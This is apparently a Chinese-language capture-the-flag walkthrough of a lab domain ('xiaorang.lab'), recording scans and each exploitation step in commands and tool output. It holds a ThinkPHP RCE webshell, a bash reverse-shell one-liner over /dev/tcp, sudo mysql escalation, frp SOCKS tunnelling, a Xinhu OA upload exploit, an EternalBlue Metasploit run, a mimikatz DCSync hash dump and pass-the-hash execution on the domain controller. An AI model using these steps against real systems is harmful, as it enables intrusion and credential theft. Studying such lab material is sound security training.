-- Initial --

初始渗透

• 靶机地址: 39.99.138.79 先进行端口与服务扫描
• nmap扫描结果

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:bf:b6:39:79:32:52:0c:76:5e:87:7d:ba:4b:f3:b8 (RSA)
|   256 a6:00:de:07:a6:42:3d:29:ee:56:78:0f:23:64:0d:8b (ECDSA)
|_  256 82:55:07:b9:e8:35:2e:a1:88:3b:73:8b:a9:0d:5d:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Bootstrap Material Admin
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

• fscan扫描结果

[2025-03-05 17:23:45] [INFO] 暴力破解线程数: 1
[2025-03-05 17:23:45] [INFO] 开始信息扫描
[2025-03-05 17:23:45] [INFO] 最终有效主机数量: 1
[2025-03-05 17:23:45] [INFO] 开始主机扫描
[2025-03-05 17:23:45] [INFO] 有效端口数量: 233
[2025-03-05 17:23:46] [SUCCESS] 端口开放 39.99.138.79:80
[2025-03-05 17:23:46] [SUCCESS] 端口开放 39.99.138.79:22
[2025-03-05 17:23:47] [SUCCESS] 服务识别 39.99.138.79:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]                                                                   
[2025-03-05 17:23:52] [SUCCESS] 服务识别 39.99.138.79:80 => [http]
[2025-03-05 17:23:57] [INFO] 存活端口数量: 2
[2025-03-05 17:23:57] [INFO] 开始漏洞扫描
[2025-03-05 17:23:57] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-05 17:23:57] [SUCCESS] 网站标题 http://39.99.138.79       状态码:200 长度:5578   标题:Bootstrap Material Admin                                                           
[2025-03-05 17:24:00] [SUCCESS] 目标: http://39.99.138.79:80
  漏洞类型: poc-yaml-thinkphp5023-method-rce                                             
  漏洞名称: poc1                                                                         
  详细信息:                                                                              
        links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce           
[2025-03-05 17:24:05] [SUCCESS] 扫描已完成: 3/3

可以发现为80端口架设了thinkphp 且存在5.0.23-rce漏洞，使用thinkphpgui获得shell

点击getshell自动生成了http://39.99.138.79//peiqi.php 连接密码:peiqi 使用蚁剑连接，并上传fcan 虚拟终端中使用/bin/bash -c \'bash -i >& /dev/tcp/xxxxxxx/10262 0>&1\' 反弹shell 得到shell后，使用sudo -l查看可用sudo提权的指令, 发现mysql可以sudo提权 得到root权限, 打印root家目录下的flag文件得到第一块flag flag{60b53231-

域渗透(第二块flag)

给fscan权限，并使用ifconfig，发现内网网段172.22.1.0-255

使用 ./fscan -h 172.22.1.0-255 扫描内网网段

./fscan -h 172.22.1.0-255
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-03-05 17:49:35] [INFO] 暴力破解线程数: 1
[2025-03-05 17:49:35] [INFO] 开始信息扫描
[2025-03-05 17:49:35] [INFO] 生成IP范围: 172.22.1.0 - 172.22.1.255
[2025-03-05 17:49:35] [INFO] 最终有效主机数量: 256
[2025-03-05 17:49:35] [INFO] 开始主机扫描
[2025-03-05 17:49:35] [SUCCESS] 目标 172.22.1.15     存活 (ICMP)
[2025-03-05 17:49:35] [SUCCESS] 目标 172.22.1.2      存活 (ICMP)
[2025-03-05 17:49:35] [SUCCESS] 目标 172.22.1.21     存活 (ICMP)
[2025-03-05 17:49:35] [SUCCESS] 目标 172.22.1.18     存活 (ICMP)
[2025-03-05 17:49:38] [INFO] 存活主机数量: 4
[2025-03-05 17:49:38] [INFO] 有效端口数量: 233
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:80
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.15:80
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.15:22
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:389
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:139
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.21:139
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:139
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:135
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.21:135
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:135
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:445
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.21:445
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:445
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:3306
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:88
[2025-03-05 17:49:38] [SUCCESS] 服务识别 172.22.1.15:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-05 17:49:39] [SUCCESS] 服务识别 172.22.1.18:3306 => [mysql] 产品:MySQL 信息:unauthorized Banner:[D.j Host '172.22.1.15' is not allowed to connect to this MySQL server]
[2025-03-05 17:49:43] [SUCCESS] 服务识别 172.22.1.18:80 => [http]
[2025-03-05 17:49:43] [SUCCESS] 服务识别 172.22.1.2:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-03-05 17:49:43] [SUCCESS] 服务识别 172.22.1.18:139 =>  Banner:[.]
[2025-03-05 17:49:43] [SUCCESS] 服务识别 172.22.1.21:139 =>  Banner:[.]
[2025-03-05 17:49:44] [SUCCESS] 服务识别 172.22.1.2:139 =>  Banner:[.]
[2025-03-05 17:49:44] [SUCCESS] 服务识别 172.22.1.15:80 => [http]
[2025-03-05 17:49:44] [SUCCESS] 服务识别 172.22.1.18:445 => 
[2025-03-05 17:49:44] [SUCCESS] 服务识别 172.22.1.21:445 => 
[2025-03-05 17:49:44] [SUCCESS] 服务识别 172.22.1.2:445 => 
[2025-03-05 17:49:44] [SUCCESS] 服务识别 172.22.1.2:88 => 
[2025-03-05 17:50:44] [SUCCESS] 服务识别 172.22.1.18:135 => 
[2025-03-05 17:50:44] [SUCCESS] 服务识别 172.22.1.21:135 => 
[2025-03-05 17:50:44] [SUCCESS] 服务识别 172.22.1.2:135 => 
[2025-03-05 17:50:44] [INFO] 存活端口数量: 15
[2025-03-05 17:50:44] [INFO] 开始漏洞扫描
[2025-03-05 17:50:44] [INFO] 加载的插件: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-05 17:50:44] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.2
主机名: DC01
发现的网络接口:
   IPv4地址:
      └─ 172.22.1.2
[2025-03-05 17:50:44] [SUCCESS] 网站标题 http://172.22.1.15        状态码:200 长度:5578   标题:Bootstrap Material Admin
[2025-03-05 17:50:44] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.21
主机名: XIAORANG-WIN7
发现的网络接口:
   IPv4地址:
      └─ 172.22.1.21
[2025-03-05 17:50:44] [INFO] 系统信息 172.22.1.2 [Windows Server 2016 Datacenter 14393]
[2025-03-05 17:50:44] [SUCCESS] 发现漏洞 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010

[2025-03-05 17:50:44] [SUCCESS] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[2025-03-05 17:50:44] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.18
主机名: XIAORANG-OA01
发现的网络接口:
   IPv4地址:
      └─ 172.22.1.18

[2025-03-05 17:50:44] [SUCCESS] NetBios 172.22.1.2      DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[2025-03-05 17:50:44] [SUCCESS] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-03-05 17:50:44] [SUCCESS] 网站标题 http://172.22.1.18        状态码:302 长度:0      标题:无标题 重定向地址: http://172.22.1.18?m=login
[2025-03-05 17:50:45] [SUCCESS] 网站标题 http://172.22.1.18?m=login 状态码:200 长度:4012   标题:信呼协同办公系统
[2025-03-05 17:50:45] [SUCCESS] 目标: http://172.22.1.15:80
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
  详细信息:
        links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

整理一下有用信息

目标主机: 172.22.1.18
主机名: XIAORANG-OA01
发现的网络接口:
   IPv4地址:
      └─ 172.22.1.18
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:80
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:139
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:135
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:445
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.18:3306 => [mysql] 产品:MySQL 信息:unauthorized Banner:[D.j Host '172.22.1.15' is not allowed to connect to this MySQL server]
[2025-03-05 17:50:45] [SUCCESS] 网站标题 http://172.22.1.18?m=login 状态码:200 长度:4012   标题:信呼协同办公系统

目标主机: 172.22.1.2
主机名: DC01
发现的网络接口:
   IPv4地址:
      └─ 172.22.1.2
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:445
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:139
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:135
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.2:88
[2025-03-05 17:50:44] [INFO] 系统信息 172.22.1.2 [Windows Server 2016 Datacenter 14393]

目标主机: 172.22.1.21
主机名: XIAORANG-WIN7
发现的网络接口:
   IPv4地址:
      └─ 172.22.1.21
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.21:139
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.21:135
[2025-03-05 17:49:38] [SUCCESS] 端口开放 172.22.1.21:445
[2025-03-05 17:50:44] [SUCCESS] 发现漏洞 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010

发现172.22.1.18架设了名为信乎的服务, 172.22.1.21为windows且存在永恒之蓝漏洞 接着上传frpc与frpc.toml, 架设通道, 以使得我们可以连接内网

frps - 服务端(安装在外网 攻击机上) frps.ini / frps.toml (./frps -c frps.toml)

[common]
bind_port = 7000 # 服务端与客户端连接的端口
token = ftp1234 # 服务端与客户端连接的密码

• frpc - 客户端(安装在内网 靶机上) frpc.ini / frps.toml (./frpc -c frpc.toml)

[common] 
server_addr = xxxxxxx # 服务端公网IP
server_port = 7000 # 连接服务端的端口
token = ftp1234 # 服务端与客户端连接的密码

[socks_proxy1]
type = tcp
remote_port = 5000 # 使服务端暴露的端口(代理的端口)
plugin = socks5 # 启用SOCKS5代理插件,该插件会将传到内网端口的流量 进一步代理转发到目标    
use_encryption = true
use_compression = true

连接成功后在浏览器使用代理, 连接到我们的frps服务中 访问172.22.1.18, 发现可以访问了(本质上是因为我们架设了frp通道, 他将我们的服务端对应端口与客户端对应端口进行 端口映射, 我们将代理设置到 服务端的5000端口, 流量就会服务端导向客户端对应端口, 到达客户端口 再进行正向代理) 访问172.22.1.18, 可见信乎版本v2.2.8, 尝试在cve官网搜索该cms是否存在漏洞, 发现漏洞还挺多的 选择出现版本与v2.2.8相近的cve, 即CVE-2023-48930Vulnerability-recurrence/xinhuOA.md 位于 main ·Maverickfir/漏洞 - 复发这里直接按照上面说的复现就行了, 这里不赘述 一句话木马文件上传成功, 使用蚁剑进行连接(记得蚁剑也要讲代理设为我们frps服务对应端口) 在adm用户目录中找到第二个flag 2ce3-4813-87d4-e8f88d0d43d6}

域渗透(第三块flag)

然后我们再攻击172.22.1.21端口, 之前用fscan扫描发现有永恒之蓝漏洞, 所以这里我们直接用msfconsole来进行攻击利用 这里要利用proxychains, 他可以将我们的命令的流量也进行代理 需要先配置proxychains, 其配置文件在kali的/etc/proxychains4.conf 最下面改成

[ProxyList]
socks5  代理ip 代理端口

然后依次使用下面命令

proxychains msfconsole 
use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/bind_tcp 
show options 
set rhosts 172.22.1.21 
run

这样就能拿到shell

再使用命令

load kiwi 
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

导出得到的哈希值

meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
1000    DC01$   3d356a4fed42f259af4ff439407190f9        532480
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
1104    XIAORANG-OA01$  e4ebe1bb47110a6120fab6df14e0f33b        4096
1108    XIAORANG-WIN7$  d644a387afcf26be38645dc3755acf36        4096

使用哈希值传递, 拿到flag (使用以下命令)

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

回显拿到flag

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/lib/python3/dist-packages/cme/cli.py:35: SyntaxWarning: invalid escape sequence '\ '
  """,
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
[proxychains] DLL init: proxychains-ng 4.17
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:49: SyntaxWarning: invalid escape sequence '\p'
  stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % self.__host
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:93: SyntaxWarning: invalid escape sequence '\{'
  command = self.__shell + 'echo '+ data + ' ^> \\\\127.0.0.1\\{}\\{} 2^>^&1 > %TEMP%\{} & %COMSPEC% /Q /c %TEMP%\{} & %COMSPEC% /Q /c del %TEMP%\{}'.format(self.__share_name, self.__output, self.__batchFile, self.__batchFile, self.__batchFile)
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:324: SyntaxWarning: invalid escape sequence '\S'
  self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:338: SyntaxWarning: invalid escape sequence '\S'
  self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
[proxychains] Dynamic chain  ...  127.0.0.1:5000  ...  172.22.1.2:445  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:5000  ...  172.22.1.2:135  ...  OK
SMB         172.22.1.2      445    DC01             [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Dynamic chain  ...  127.0.0.1:5000  ...  172.22.1.2:445  ...  OK
SMB         172.22.1.2      445    DC01             [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)
[proxychains] Dynamic chain  ...  127.0.0.1:5000  ...  172.22.1.2:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:5000  ...  172.22.1.2:49668  ...  OK
SMB         172.22.1.2      445    DC01             [+] Executed command 
SMB         172.22.1.2      445    DC01             ___   ___
SMB         172.22.1.2      445    DC01             \\ / /       / /    // | |     //   ) ) //   ) )  // | |     /|    / / //   ) )
SMB         172.22.1.2      445    DC01             \  /       / /    //__| |    //   / / //___/ /  //__| |    //|   / / //
SMB         172.22.1.2      445    DC01             / /       / /    / ___  |   //   / / / ___ (   / ___  |   // |  / / //  ____
SMB         172.22.1.2      445    DC01             / /\\     / /    //    | |  //   / / //   | |  //    | |  //  | / / //    / /
SMB         172.22.1.2      445    DC01             / /  \\ __/ /___ //     | | ((___/ / //    | | //     | | //   |/ / ((____/ /
SMB         172.22.1.2      445    DC01             
SMB         172.22.1.2      445    DC01             
SMB         172.22.1.2      445    DC01             flag03: e8f88d0d43d6}
SMB         172.22.1.2      445    DC01             
SMB         172.22.1.2      445    DC01             Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.